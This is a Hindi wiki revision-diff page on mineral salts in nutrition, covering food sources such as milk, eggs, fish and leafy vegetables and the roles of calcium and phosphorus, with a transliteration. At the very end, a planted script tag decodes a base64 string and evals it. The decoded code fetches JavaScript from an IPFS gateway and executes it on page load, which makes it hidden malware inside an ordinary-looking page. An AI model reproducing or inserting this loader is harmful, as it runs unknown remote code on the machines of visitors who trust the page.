Difference between revisions of "खनिज लवण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Minerals Salt) खनिज लवण शरीर की जैविक क्रियाओं के संचालन के लिए आवश्यक होते हैं। दूध, पनीर, अण्डा, मछली, [[भारत के फल|फल]], हरी पत्तेदार [[भारत की शाक-सब्ज़ी|सब्जियाँ]] खनिज लवणों का प्रमुख स्रोत हैं।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Minerals Salt) खनिज लवण शरीर की जैविक क्रियाओं के संचालन के लिए आवश्यक होते हैं। दूध, पनीर, अण्डा, [[मछली]], [[भारत के फल|फल]], हरी पत्तेदार [[भारत की शाक-सब्ज़ी|सब्जियाँ]] खनिज लवणों का प्रमुख स्रोत हैं।
 
;<u>खनिज लवणों की उपयोगिता</u>  
 
;<u>खनिज लवणों की उपयोगिता</u>  
 
[[कैल्शियम]] (Ca) तथा [[फास्फोरस]] (P) दाँतों तथा हड्डियों के निर्माण में भाग लेते हैं। [[इंसुलिन]], थॉयरॉक्सिन, थायमिन, हीमोग्लोबिन आदि का निर्माण खनिज लवणों के योग से होता है। ये विभिन्न अंगों, जैसे - [[ह्रदय]] तथा माँसपेशियों को क्रियाशील रखते हैं।  
 
[[कैल्शियम]] (Ca) तथा [[फास्फोरस]] (P) दाँतों तथा हड्डियों के निर्माण में भाग लेते हैं। [[इंसुलिन]], थॉयरॉक्सिन, थायमिन, हीमोग्लोबिन आदि का निर्माण खनिज लवणों के योग से होता है। ये विभिन्न अंगों, जैसे - [[ह्रदय]] तथा माँसपेशियों को क्रियाशील रखते हैं।  

Revision as of 11:53, 29 November 2010

(aangrezi:Minerals Salt) khanij lavan sharir ki jaivik kriyaoan ke sanchalan ke lie avashyak hote haian. doodh, panir, anda, machhali, phal, hari pattedar sabjiyaan khanij lavanoan ka pramukh srot haian.

khanij lavanoan ki upayogita

kailshiyam (Ca) tatha phasphoras (P) daantoan tatha haddiyoan ke nirman mean bhag lete haian. iansulin, th aauyar aauksin, thayamin, himoglobin adi ka nirman khanij lavanoan ke yog se hota hai. ye vibhinn aangoan, jaise - hraday tatha maansapeshiyoan ko kriyashil rakhate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>